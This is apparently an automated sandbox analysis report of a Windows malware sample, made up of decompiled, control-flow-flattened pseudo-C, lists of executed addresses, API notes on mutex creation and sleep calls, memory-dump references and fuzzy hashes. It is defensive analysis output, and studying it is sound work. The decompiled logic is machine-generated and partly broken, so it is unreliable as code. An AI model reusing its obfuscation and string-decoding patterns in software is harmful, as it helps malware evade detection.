								__eflags = _t201 - 0xca288c41;
								if(_t201 != 0xca288c41) {
									__eflags = _t201 - 0xd9502225;
									if(_t201 == 0xd9502225) {
										 *_t290 = 0;
										_t111 = 0x701b759;
									} else {
										_t111 = _t201;
										__eflags = _t201 - 0xda537fa7;
										if(_t201 == 0xda537fa7) {
											_t111 = _v92;
										}
									}
								}
							}
							continue;
						}
						if(_t201 > 0xc10a918e) {
							__eflags = _t201 - 0xc10a918f;
							if(_t201 == 0xc10a918f) {
								__eflags = _v148 - 8;
								goto L96;
							}
							__eflags = _t201 - 0xc7704248;
							if(_t201 == 0xc7704248) {
								__eflags = _v160 - 8;
								_t111 =  ==  ? 0x93c76e2d : 0x945c137a;
							} else {
								_t111 = _t201;
								__eflags = _t201 - 0xc88989fd;
								if(_t201 == 0xc88989fd) {
									_t283 = _v80;
									_v160 =  *_t283;
									_t111 = 0x7c8c10e9;
								}
							}
							continue;
						}
						if(_t201 <= 0xbe5a0f3e) {
							__eflags = _t201 - 0xb0b3b626;
							if(_t201 != 0xb0b3b626) {
								_t111 = _t201;
								__eflags = _t201 - 0xb42b969a;
								if(_t201 != 0xb42b969a) {
									continue;
								}
								E012D3998(_v136);
								E012E0C45(); // executed
								__eflags = 0;
								ExitProcess();
							}
							_v120 = _t283;
							r8d = 0x30;
							E012DC8BC(0, _t283, _v104, _t304, _t306);
							_t262 = 1;
							r8d = 0x27c2b783;
							r9d = 0xd;
							E012DFAD7(1, _t269, _t283, _v104);
							r8d = 0x30;
							_t292 = 0x12e02a4;
							_t299 = _v112;
							_t268 = 0x79849ae;
							 *_t283();
							_t283 = _v112;
							__eflags =  *((intOrPtr*)(_t283 + 0x28)) - 0x1000000;
							_t111 =  ==  ? 0x48479475 : 0x27daf151;
						} else {
							if(_t201 == 0xbe5a0f3f) {
								_t111 = 0x63da8ac0;
								_v124 = 0x3e8;
							} else {
								_t111 = _t201;
								if(_t201 == 0xbf82bb62) {
									_t111 =  ==  ? 0x91ac664b : 0x945c137a;
								}
							}
						}
						continue;
						L10:
						__eflags = _t201 - 0x2e98952c;
						if(_t201 > 0x2e98952c) {
							__eflags = _t201 - 0x5c545ed3;
							if(_t201 > 0x5c545ed3) {
								__eflags = _t201 - 0x7c8c10e8;
								if(_t201 > 0x7c8c10e8) {
									__eflags = _t201 - 0x7c8c10e9;
									if(_t201 == 0x7c8c10e9) {
										__eflags = _v160 - 2;
										_t111 =  <  ? 0x537690ef : 0xe1b9813;
										continue;
									}
									__eflags = _t201 - 0x7d4a3cd4;
									if(_t201 == 0x7d4a3cd4) {
										_t292 = _v136;
										__eflags = E012DA504(_t262, _t268, _t271, _t283, _t292, _t305);
										_t115 = 0x91ac664b;
										goto L112;
									}
									_t111 = _t201;
									__eflags = _t201 - 0x7da7801f;
									if(_t201 == 0x7da7801f) {
										__eflags = _v160;
										_t111 =  ==  ? 0x51fb7187 : 0x945c137a;
									}
									continue;
								}
								__eflags = _t201 - 0x5c545ed4;
								if(_t201 == 0x5c545ed4) {
									_t262 = 1;
									r8d = 0x510b3a3e;
									r9d = 0x5c;
									E012DFAD7(1, _t269, _t283, _t292);
									 *_t283();
									_t111 = 0xc88989fd;
								} else {
									__eflags = _t201 - 0x63da8ac0;
									if(_t201 == 0x63da8ac0) {
										r8d = 0x9d3c7b7a;
										r9d = 0xb2;
										E012DFAD7(1, _t269, _t283, _t292);
										SleepEx(??, ??); // executed
										_t262 = 0x20;
										E012D9F06(0x20, _t269, _v136, _t299, _t304, _t306);
										_t299 = _v136 + _t283;
										_t292 = _v136 + _t283;
										__eflags = E012D3A22(_t283, _t292, _v136 + _t283);
										_t111 =  !=  ? 0x5c545ed4 : 0xc88989fd;
									} else {
										_t111 = _t201;
										__eflags = _t201 - 0x6dc18416;
										if(_t201 == 0x6dc18416) {
											_v152 = _v152 + _v164 - (_v156 << 4);
											_v164 = _v156 + _t292 + _t292 * 2 + 0xffffffb3;
											_t111 = 0x2e98952d;
										}
									}
								}
								continue;
							}
							__eflags = _t201 - 0x48479474;
							if(_t201 > 0x48479474) {
								__eflags = _t201 - 0x48479475;
								if(_t201 == 0x48479475) {
									_t111 = 0x27daf151;
									while(1) {
										L1:
										_v120 = _t292;
										goto L2;
									}
								}
								__eflags = _t201 - 0x51fb7187;
								if(_t201 == 0x51fb7187) {
									_t292 = _v136;
									E012DC32D(_t262, _t283, _t292, _t306);
									goto L107;
								}
								_t111 = _t201;
								__eflags = _t201 - 0x537690ef;
								if(_t201 == 0x537690ef) {
									__eflags = _v160;
									_t111 =  <=  ? 0x7da7801f : 0x7d4a3cd4;
								}
								continue;
							}
							__eflags = _t201 - 0x2e98952d;
							if(_t201 == 0x2e98952d) {
								E012DCDB9(0xc40, _t283);
								_v136 = _t283;
								_t292 = _v136;
								_t262 = 0x10;
								E012D9F06(0x10, _t269, _t292, _t299, _t304, _t306);
								_v80 = _v136 + _t292;
								_t283 = _v80;
								_v148 =  *_t283;
								_t111 = 0x843901b2;
								continue;
							}
							__eflags = _t201 - 0x2f0fb31e;
							if(_t201 == 0x2f0fb31e) {
								_t283 = _v72;
								_t292 = 0x12e02a4;
								__eflags = _t283 - 0x12e02a4;
								_t111 =  <  ? 0xb0b3b626 : 0x27daf151;
								goto L1;
							} else {
								_t111 = _t201;
								__eflags = _t201 - 0x34527dc1;
								if(_t201 == 0x34527dc1) {
									_v140 = r12d;
									__eflags = _v140 - 0x2b4;
									_t111 =  <  ? 0x834d46ed : 0x9a2c0e1f;
								}
								continue;
							}
						}
						__eflags = _t201 - 0x13aae926;
						if(_t201 > 0x13aae926) {
							__eflags = _t201 - 0x18cf248b;
							if(_t201 > 0x18cf248b) {
								__eflags = _t201 - 0x18cf248c;
								if(_t201 == 0x18cf248c) {
									__eflags = _v160 - 0x40;
									_t111 =  ==  ? 0x187c6430 : 0x945c137a;
								} else {
									__eflags = _t201 - 0x27daf151;
									if(_t201 == 0x27daf151) {
										E012DCC2E(_t283, _v104);
										_t111 = 0xf29a3544;
										_t292 = _v120;
										_t269 = _t201;
									} else {
										_t111 = _t201;
										__eflags = _t201 - 0x28c5e58b;
										if(_t201 == 0x28c5e58b) {
											r13d = 0;
											_v152 = r13d;
											_v164 = r13d;
											_v156 = r13d;
											_t111 = 0xa1a997a0;
										}
									}
								}
								continue;
							}
							__eflags = _t201 - 0x13aae927;
							if(_t201 == 0x13aae927) {
								__eflags = _v148 - 8;
								_t111 =  <  ? 0xeb6755e2 : 0xc10a918f;
								continue;
							}
							__eflags = _t201 - 0x170b999c;
							if(__eflags == 0) {
								E012DFC4D(_t197, _t262, _t268, _t269, __eflags, _t283, _t292, _t304, _t305, _t306);
								_t111 = _v84;
								continue;
							}
							_t111 = _t201;
							__eflags = _t201 - 0x187c6430;
							if(_t201 != 0x187c6430) {
								continue;
							} else {
								_t262 = 1;
								r8d = 0x510b3a3e;
								r9d = 0x5c;
								E012DFAD7(1, _t269, _t283, _t292);
								 *_t283();
								goto L107;
							}
						} else {
							__eflags = _t201 - 0x79849ad;
							if(_t201 > 0x79849ad) {
								__eflags = _t201 - 0x79849ae;
								if(_t201 == 0x79849ae) {
									_t111 = 0x63da8ac0;
									_v124 = 0x7530;
								} else {
									__eflags = _t201 - 0xd4e563f;
									if(_t201 == 0xd4e563f) {
										_t269 = 0;
										_t111 = _t271;
									} else {
										_t111 = _t201;
										__eflags = _t201 - 0xe1b9813;
										if(_t201 == 0xe1b9813) {
											__eflags = _v160 - 8;
											_t111 =  <  ? 0xbf82bb62 : 0xfbdae760;
										}
									}
								}
							} else {
								__eflags = _t201 - 0xf29a3544;
								if(_t201 == 0xf29a3544) {
									__eflags = (_t269 ^ 0x000000fe) & sil;
									_t111 =  ==  ? 0x28c5e58b : 0x854a966f;
								} else {
									__eflags = _t201 - 0xfbdae760;
									if(_t201 == 0xfbdae760) {
										__eflags = _v160 - 0x40;
										_t111 =  <  ? 0xc7704248 : 0x18cf248c;
									} else {
										_t111 = _t201;
										__eflags = _t201 - 0x701b759;
										if(_t201 == 0x701b759) {
											_t269 = 0;
											_t111 = _v88;
										}
									}
								}
							}
							continue;
						}
					}
				}
			}



































                                                                                                                                                        0x012e02a4
                                                                                                                                                        0x012e02a4
                                                                                                                                                        0x012e02a4
                                                                                                                                                        0x012e02a4
                                                                                                                                                        0x012e02a4
                                                                                                                                                        0x012e02a4
                                                                                                                                                        0x012e02a4
                                                                                                                                                        0x012e02b7
                                                                                                                                                        0x012e02c6
                                                                                                                                                        0x012e02cc
                                                                                                                                                        0x012e02d7
                                                                                                                                                        0x012e02db
                                                                                                                                                        0x012e02e6
                                                                                                                                                        0x012e02e9
                                                                                                                                                        0x012e02f2
                                                                                                                                                        0x012e02f6
                                                                                                                                                        0x012e02fa
                                                                                                                                                        0x012e0305
                                                                                                                                                        0x012e0309
                                                                                                                                                        0x012e030e
                                                                                                                                                        0x012e0313
                                                                                                                                                        0x012e0313
                                                                                                                                                        0x012e0313
                                                                                                                                                        0x012e0318
                                                                                                                                                        0x012e0318
                                                                                                                                                        0x012e0318
                                                                                                                                                        0x012e031f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012e0321
                                                                                                                                                        0x012e0327
                                                                                                                                                        0x012e03d2
                                                                                                                                                        0x012e03d8
                                                                                                                                                        0x012e04b1
                                                                                                                                                        0x012e04b7
                                                                                                                                                        0x012e0656
                                                                                                                                                        0x012e065c
                                                                                                                                                        0x012e0a72
                                                                                                                                                        0x012e0a77
                                                                                                                                                        0x012e0a7c
                                                                                                                                                        0x012e0a81
                                                                                                                                                        0x012e0a8d
                                                                                                                                                        0x012e0a93
                                                                                                                                                        0x012e0a99
                                                                                                                                                        0x012e0aa0
                                                                                                                                                        0x012e0aa2
                                                                                                                                                        0x012e0abe
                                                                                                                                                        0x012e0ac4
                                                                                                                                                        0x012e0aca
                                                                                                                                                        0x012e0acf
                                                                                                                                                        0x012e0ad8
                                                                                                                                                        0x012e0ade
                                                                                                                                                        0x012e0ae4
                                                                                                                                                        0x012e0aef
                                                                                                                                                        0x012e0af6
                                                                                                                                                        0x012e0af9
                                                                                                                                                        0x012e0b01
                                                                                                                                                        0x012e0b04
                                                                                                                                                        0x012e0b13
                                                                                                                                                        0x012e0662
                                                                                                                                                        0x012e0662
                                                                                                                                                        0x012e0668
                                                                                                                                                        0x012e0b1b
                                                                                                                                                        0x012e0b24
                                                                                                                                                        0x012e0b33
                                                                                                                                                        0x012e066e
                                                                                                                                                        0x012e066e
                                                                                                                                                        0x012e0670
                                                                                                                                                        0x012e0676
                                                                                                                                                        0x012e067c
                                                                                                                                                        0x012e0684
                                                                                                                                                        0x012e0684
                                                                                                                                                        0x012e0676
                                                                                                                                                        0x012e0668
                                                                                                                                                        0x012e0318
                                                                                                                                                        0x012e0318
                                                                                                                                                        0x012e0318
                                                                                                                                                        0x012e031f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012e031f
                                                                                                                                                        0x012e0318
                                                                                                                                                        0x012e04bd
                                                                                                                                                        0x012e04c3
                                                                                                                                                        0x012e0931
                                                                                                                                                        0x012e0936
                                                                                                                                                        0x012e0b60
                                                                                                                                                        0x012e0b60
                                                                                                                                                        0x012e0318
                                                                                                                                                        0x012e0318
                                                                                                                                                        0x012e0318
                                                                                                                                                        0x012e031f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012e031f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012e0318
                                                                                                                                                        0x012e04c9
                                                                                                                                                        0x012e04cf
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012e04d5
                                                                                                                                                        0x012e04d5
                                                                                                                                                        0x012e04d7
                                                                                                                                                        0x012e04dd
                                                                                                                                                        0x012e04e3
                                                                                                                                                        0x012e04e8
                                                                                                                                                        0x012e04ec
                                                                                                                                                        0x012e04ec
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012e04dd
                                                                                                                                                        0x012e04cf
                                                                                                                                                        0x012e03de
                                                                                                                                                        0x012e03e4
                                                                                                                                                        0x012e05e8
                                                                                                                                                        0x012e05ee
                                                                                                                                                        0x012e0a2b
                                                                                                                                                        0x012e0a3a
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012e0a3a
                                                                                                                                                        0x012e05f4
                                                                                                                                                        0x012e05fa
                                                                                                                                                        0x012e0a42
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012e0a42
                                                                                                                                                        0x012e0600
                                                                                                                                                        0x012e0602
                                                                                                                                                        0x012e0608
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012e060e
                                                                                                                                                        0x012e0618
                                                                                                                                                        0x012e061a
                                                                                                                                                        0x012e0bc8
                                                                                                                                                        0x012e0bcd
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012e0bcd
                                                                                                                                                        0x012e03ea
                                                                                                                                                        0x012e03f0
                                                                                                                                                        0x012e085c
                                                                                                                                                        0x012e087f
                                                                                                                                                        0x012e08a1
                                                                                                                                                        0x012e08af
                                                                                                                                                        0x012e08b3
                                                                                                                                                        0x012e08b8
                                                                                                                                                        0x012e08bc
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012e08bc
                                                                                                                                                        0x012e03f6
                                                                                                                                                        0x012e03fc
                                                                                                                                                        0x012e08ca
                                                                                                                                                        0x012e08d7
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012e08d7
                                                                                                                                                        0x012e0402
                                                                                                                                                        0x012e0404
                                                                                                                                                        0x012e040a
                                                                                                                                                        0x012e0c2a
                                                                                                                                                        0x012e0410
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012e0410
                                                                                                                                                        0x012e040a
                                                                                                                                                        0x012e0333
                                                                                                                                                        0x012e0473
                                                                                                                                                        0x012e0479
                                                                                                                                                        0x012e0624
                                                                                                                                                        0x012e062a
                                                                                                                                                        0x012e0a50
                                                                                                                                                        0x012e0a58
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012e0a58
                                                                                                                                                        0x012e0630
                                                                                                                                                        0x012e0636
                                                                                                                                                        0x012e0a60
                                                                                                                                                        0x012e0a65
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012e0a65
                                                                                                                                                        0x012e063c
                                                                                                                                                        0x012e063e
                                                                                                                                                        0x012e0644
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012e064e
                                                                                                                                                        0x012e09f9
                                                                                                                                                        0x012e09fe
                                                                                                                                                        0x012e047f
                                                                                                                                                        0x012e047f
                                                                                                                                                        0x012e0482
                                                                                                                                                        0x012e0488
                                                                                                                                                        0x012e048e
                                                                                                                                                        0x012e0494
                                                                                                                                                        0x012e0924
                                                                                                                                                        0x012e0927
                                                                                                                                                        0x012e049a
                                                                                                                                                        0x012e049a
                                                                                                                                                        0x012e049c
                                                                                                                                                        0x012e04a2
                                                                                                                                                        0x012e04a8
                                                                                                                                                        0x012e04a8
                                                                                                                                                        0x012e04a2
                                                                                                                                                        0x012e0494
                                                                                                                                                        0x012e0488
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012e0479
                                                                                                                                                        0x012e033f
                                                                                                                                                        0x012e05ad
                                                                                                                                                        0x012e05b3
                                                                                                                                                        0x012e09f6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012e09f6
                                                                                                                                                        0x012e05b9
                                                                                                                                                        0x012e05bf
                                                                                                                                                        0x012e0a0a
                                                                                                                                                        0x012e0a17
                                                                                                                                                        0x012e05c5
                                                                                                                                                        0x012e05c5
                                                                                                                                                        0x012e05c7
                                                                                                                                                        0x012e05cd
                                                                                                                                                        0x012e05d3
                                                                                                                                                        0x012e05da
                                                                                                                                                        0x012e05de
                                                                                                                                                        0x012e05de
                                                                                                                                                        0x012e05cd
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012e05bf
                                                                                                                                                        0x012e034b
                                                                                                                                                        0x012e0788
                                                                                                                                                        0x012e078e
                                                                                                                                                        0x012e0bd5
                                                                                                                                                        0x012e0bd7
                                                                                                                                                        0x012e0bdd
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012e0c30
                                                                                                                                                        0x012e0c37
                                                                                                                                                        0x012e0c3c
                                                                                                                                                        0x012e0c3e
                                                                                                                                                        0x012e0c3e
                                                                                                                                                        0x012e079b
                                                                                                                                                        0x012e07a0
                                                                                                                                                        0x012e07a8
                                                                                                                                                        0x012e07b4
                                                                                                                                                        0x012e07b9
                                                                                                                                                        0x012e07bf
                                                                                                                                                        0x012e07c5
                                                                                                                                                        0x012e07ca
                                                                                                                                                        0x012e07d0
                                                                                                                                                        0x012e07d7
                                                                                                                                                        0x012e07da
                                                                                                                                                        0x012e07df
                                                                                                                                                        0x012e07e1
                                                                                                                                                        0x012e07e6
                                                                                                                                                        0x012e07f7
                                                                                                                                                        0x012e0351
                                                                                                                                                        0x012e0357
                                                                                                                                                        0x012e07ff
                                                                                                                                                        0x012e0804
                                                                                                                                                        0x012e035d
                                                                                                                                                        0x012e035d
                                                                                                                                                        0x012e0365
                                                                                                                                                        0x012e0378
                                                                                                                                                        0x012e0378
                                                                                                                                                        0x012e0365
                                                                                                                                                        0x012e0357
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012e037d
                                                                                                                                                        0x012e037d
                                                                                                                                                        0x012e0383
                                                                                                                                                        0x012e0415
                                                                                                                                                        0x012e041b
                                                                                                                                                        0x012e054c
                                                                                                                                                        0x012e0552
                                                                                                                                                        0x012e074b
                                                                                                                                                        0x012e0751
                                                                                                                                                        0x012e0ba2
                                                                                                                                                        0x012e0baf
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012e0baf
                                                                                                                                                        0x012e0757
                                                                                                                                                        0x012e075d
                                                                                                                                                        0x012e0bb7
                                                                                                                                                        0x012e0bc1
                                                                                                                                                        0x012e0bc3
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012e0bc3
                                                                                                                                                        0x012e0763
                                                                                                                                                        0x012e0765
                                                                                                                                                        0x012e076b
                                                                                                                                                        0x012e0771
                                                                                                                                                        0x012e0780
                                                                                                                                                        0x012e0780
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012e076b
                                                                                                                                                        0x012e0558
                                                                                                                                                        0x012e055e
                                                                                                                                                        0x012e0969
                                                                                                                                                        0x012e096e
                                                                                                                                                        0x012e0974
                                                                                                                                                        0x012e097a
                                                                                                                                                        0x012e0984
                                                                                                                                                        0x012e0986
                                                                                                                                                        0x012e0564
                                                                                                                                                        0x012e0564
                                                                                                                                                        0x012e056a
                                                                                                                                                        0x012e0997
                                                                                                                                                        0x012e099d
                                                                                                                                                        0x012e09a3
                                                                                                                                                        0x012e09ae
                                                                                                                                                        0x012e09b5
                                                                                                                                                        0x012e09ba
                                                                                                                                                        0x012e09c9
                                                                                                                                                        0x012e09d6
                                                                                                                                                        0x012e09de
                                                                                                                                                        0x012e09ea
                                                                                                                                                        0x012e0570
                                                                                                                                                        0x012e0570
                                                                                                                                                        0x012e0572
                                                                                                                                                        0x012e0578
                                                                                                                                                        0x012e058b
                                                                                                                                                        0x012e059f
                                                                                                                                                        0x012e05a3
                                                                                                                                                        0x012e05a3
                                                                                                                                                        0x012e0578
                                                                                                                                                        0x012e056a
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012e055e
                                                                                                                                                        0x012e0421
                                                                                                                                                        0x012e0427
                                                                                                                                                        0x012e06cc
                                                                                                                                                        0x012e06d2
                                                                                                                                                        0x012e0c0b
                                                                                                                                                        0x012e0313
                                                                                                                                                        0x012e0313
                                                                                                                                                        0x012e0313
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012e0313
                                                                                                                                                        0x012e0313
                                                                                                                                                        0x012e06d8
                                                                                                                                                        0x012e06de
                                                                                                                                                        0x012e0b56
                                                                                                                                                        0x012e0b5b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012e0b5b
                                                                                                                                                        0x012e06e4
                                                                                                                                                        0x012e06e6
                                                                                                                                                        0x012e06ec
                                                                                                                                                        0x012e06f2
                                                                                                                                                        0x012e0701
                                                                                                                                                        0x012e0701
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012e06ec
                                                                                                                                                        0x012e042d
                                                                                                                                                        0x012e0433
                                                                                                                                                        0x012e08e4
                                                                                                                                                        0x012e08e9
                                                                                                                                                        0x012e08ee
                                                                                                                                                        0x012e08f3
                                                                                                                                                        0x012e08f8
                                                                                                                                                        0x012e090a
                                                                                                                                                        0x012e090f
                                                                                                                                                        0x012e0916
                                                                                                                                                        0x012e091a
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012e091a
                                                                                                                                                        0x012e0439
                                                                                                                                                        0x012e043f
                                                                                                                                                        0x012e0be5
                                                                                                                                                        0x012e0bed
                                                                                                                                                        0x012e0bf4
                                                                                                                                                        0x012e0c01
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012e0445
                                                                                                                                                        0x012e0445
                                                                                                                                                        0x012e0447
                                                                                                                                                        0x012e044d
                                                                                                                                                        0x012e0453
                                                                                                                                                        0x012e045c
                                                                                                                                                        0x012e046b
                                                                                                                                                        0x012e046b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012e044d
                                                                                                                                                        0x012e043f
                                                                                                                                                        0x012e0389
                                                                                                                                                        0x012e038f
                                                                                                                                                        0x012e04f6
                                                                                                                                                        0x012e04fc
                                                                                                                                                        0x012e0709
                                                                                                                                                        0x012e070f
                                                                                                                                                        0x012e0b6e
                                                                                                                                                        0x012e0b7b
                                                                                                                                                        0x012e0715
                                                                                                                                                        0x012e0715
                                                                                                                                                        0x012e071b
                                                                                                                                                        0x012e0b88
                                                                                                                                                        0x012e0b8d
                                                                                                                                                        0x012e0b92
                                                                                                                                                        0x012e0b97
                                                                                                                                                        0x012e0721
                                                                                                                                                        0x012e0721
                                                                                                                                                        0x012e0723
                                                                                                                                                        0x012e0729
                                                                                                                                                        0x012e072f
                                                                                                                                                        0x012e0732
                                                                                                                                                        0x012e0737
                                                                                                                                                        0x012e073c
                                                                                                                                                        0x012e0741
                                                                                                                                                        0x012e0741
                                                                                                                                                        0x012e0729
                                                                                                                                                        0x012e071b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012e070f
                                                                                                                                                        0x012e0502
                                                                                                                                                        0x012e0508
                                                                                                                                                        0x012e0944
                                                                                                                                                        0x012e0951
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012e0951
                                                                                                                                                        0x012e050e
                                                                                                                                                        0x012e0514
                                                                                                                                                        0x012e0959
                                                                                                                                                        0x012e095e
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012e095e
                                                                                                                                                        0x012e051a
                                                                                                                                                        0x012e051c
                                                                                                                                                        0x012e0522
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012e0528
                                                                                                                                                        0x012e052a
                                                                                                                                                        0x012e052f
                                                                                                                                                        0x012e0535
                                                                                                                                                        0x012e053b
                                                                                                                                                        0x012e0545
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012e0545
                                                                                                                                                        0x012e0395
                                                                                                                                                        0x012e0395
                                                                                                                                                        0x012e039b
                                                                                                                                                        0x012e068d
                                                                                                                                                        0x012e0693
                                                                                                                                                        0x012e0b3b
                                                                                                                                                        0x012e0b40
                                                                                                                                                        0x012e0699
                                                                                                                                                        0x012e0699
                                                                                                                                                        0x012e069f
                                                                                                                                                        0x012e0b4d
                                                                                                                                                        0x012e0b4f
                                                                                                                                                        0x012e06a5
                                                                                                                                                        0x012e06a5
                                                                                                                                                        0x012e06a7
                                                                                                                                                        0x012e06ad
                                                                                                                                                        0x012e06b7
                                                                                                                                                        0x012e06c4
                                                                                                                                                        0x012e06c4
                                                                                                                                                        0x012e06ad
                                                                                                                                                        0x012e069f
                                                                                                                                                        0x012e03a1
                                                                                                                                                        0x012e03a1
                                                                                                                                                        0x012e03a7
                                                                                                                                                        0x012e0815
                                                                                                                                                        0x012e0822
                                                                                                                                                        0x012e03ad
                                                                                                                                                        0x012e03ad
                                                                                                                                                        0x012e03b3
                                                                                                                                                        0x012e082e
                                                                                                                                                        0x012e083b
                                                                                                                                                        0x012e03b9
                                                                                                                                                        0x012e03b9
                                                                                                                                                        0x012e03bb
                                                                                                                                                        0x012e03c1
                                                                                                                                                        0x012e03c7
                                                                                                                                                        0x012e03c9
                                                                                                                                                        0x012e03c9
                                                                                                                                                        0x012e03c1
                                                                                                                                                        0x012e03b3
                                                                                                                                                        0x012e03a7
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012e039b
                                                                                                                                                        0x012e038f
                                                                                                                                                        0x012e0318

                                                                                                                                                        APIs
                                                                                                                                                        • SleepEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,FD91BC21), ref: 012E09AE
                                                                                                                                                          • Part of subcall function 012D3A22: CreateMutexExA.KERNEL32(?,?,?,079849AE,0701B759,012E09DE), ref: 012D3A4E
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.368911222.00000000012D1000.00000020.00000001.sdmp, Offset: 012D0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.368893013.00000000012D0000.00000002.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.368940818.00000000012E4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.368999147.00000000012E7000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                        • String ID: 0u$?VN$?VN$c/9$c/9$Ug$Ug
                                                                                                                                                        • API String ID: 1464230837-3375559661
                                                                                                                                                        • Opcode ID: 6b69fe40e889eeef2de17b3194c4735dd1379a6845d9a8b4328103bb9d698c9b
                                                                                                                                                        • Instruction ID: 217bffd81f85239a6b273a132948f3dcb4be9861fb529831f211ec0d86340970
                                                                                                                                                        • Opcode Fuzzy Hash: 6b69fe40e889eeef2de17b3194c4735dd1379a6845d9a8b4328103bb9d698c9b
                                                                                                                                                        • Instruction Fuzzy Hash: 2812D5717382468BDB6C8B1CD4A863E67E1E788B44F90011DF74BD7F64DAA8CC428B59
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 012D8282, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 192processCOMMONCrypto
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 42%
                                                                                                                                                        			E012D8282(signed long long __rax, signed long long __rcx, void* __rdx, void* __r9) {
				void* _t50;
				void* _t71;
				signed int _t82;
				signed int _t86;
				signed int _t91;
				void* _t101;
				void* _t102;
				signed long long _t112;
				long long* _t113;
				signed long long _t114;
				signed long long _t118;
				signed long long _t119;
				void* _t122;
				void* _t123;
				void* _t125;
				void* _t128;
				void* _t129;

				_t116 = __rdx;
				_t114 = __rcx;
				_t112 = __rax;
				asm("movaps [esp+0x70], xmm6");
				_t128 = __r9;
				_t103 = r8d;
				_t129 = __rdx;
				E012D3998(__rcx);
				_t1 = _t122 + 0x50; // 0xff390cf0
				_t118 = _t1 | _t112;
				_t101 =  ==  ? 0x11a1a452 : 0x7de529e8;
				_t50 = 0x2b8f7bbc;
				asm("xorps xmm6, xmm6");
				while(1) {
					L1:
					_t71 = _t50;
					if(_t50 <= 0x2b8f7bbb) {
						break;
					}
					if(_t71 > 0x7de529e7) {
						if(_t71 == 0x7de529e8) {
							 *(_t122 + 0x50) = 0;
							 *((intOrPtr*)(_t122 + 0x54)) = 0x69d0435b;
							 *((intOrPtr*)(_t122 + 0x58)) = 0x69d01959;
							 *((intOrPtr*)(_t122 + 0x5c)) = 0x5b43759;
							if( *(_t122 + 0x50) == 0) {
								do {
									_t91 =  *(_t122 + 0x50 + _t112 * 4);
									_t103 =  !_t91 & 0x05b43735;
									 *(_t122 + 0x50 + _t112 * 4) = _t91 & 0xfa4bc8ca |  !_t91 & 0x05b43735;
									_t114 = _t114 + 1;
									_t112 = _t112 + 1;
								} while (_t112 != 4);
							}
							_t114 = _t118;
							E012D1517(_t101, _t114, _t116, _t123, _t125);
							_t50 =  ==  ? 0x7df23ede : 0x3df03fa4;
						} else {
							_t50 = _t71;
							if(_t71 == 0x7df23ede) {
								 *(_t122 + 0x50) = 0;
								 *((intOrPtr*)(_t122 + 0x54)) = 0x7139785;
								 *((intOrPtr*)(_t122 + 0x58)) = 0x29128283;
								if( *(_t122 + 0x50) == 0) {
									do {
										_t82 =  *(_t122 + 0x54 + _t112 * 4);
										_t96 =  !_t82 & 0x0eb19f8e;
										 *(_t122 + 0x54 + _t112 * 4) = (_t82 & 0xf14e6071 |  !_t82 & 0x0eb19f8e) ^ 0x27c66568;
									} while (_t112 == 0);
								}
								L23:
								_t50 = 0x9f3e05ed;
							}
						}
						continue;
						L32:
					}
					_t50 = _t101;
					if(_t71 == 0x2b8f7bbc) {
						continue;
					}
					if(_t71 == 0x3df03fa4) {
						 *(_t122 + 0x50) = 0;
						 *((intOrPtr*)(_t122 + 0x54)) = 0x16e400f6;
						 *((intOrPtr*)(_t122 + 0x58)) = 0x8f10afc;
						 *((intOrPtr*)(_t122 + 0x5c)) = 0x1fec1dbd;
						 *((intOrPtr*)(_t122 + 0x60)) = 0x7a947893;
						if( *(_t122 + 0x50) == 0) {
							do {
								_t86 =  *(_t122 + 0x54 + _t112 * 4);
								_t96 =  !_t86 & 0x7a947893;
								 *(_t122 + 0x54 + _t112 * 4) = _t86 & 0x856b876c |  !_t86 & 0x7a947893;
								_t112 = _t112 + 1;
							} while (_t112 != 4);
						}
						goto L23;
					}
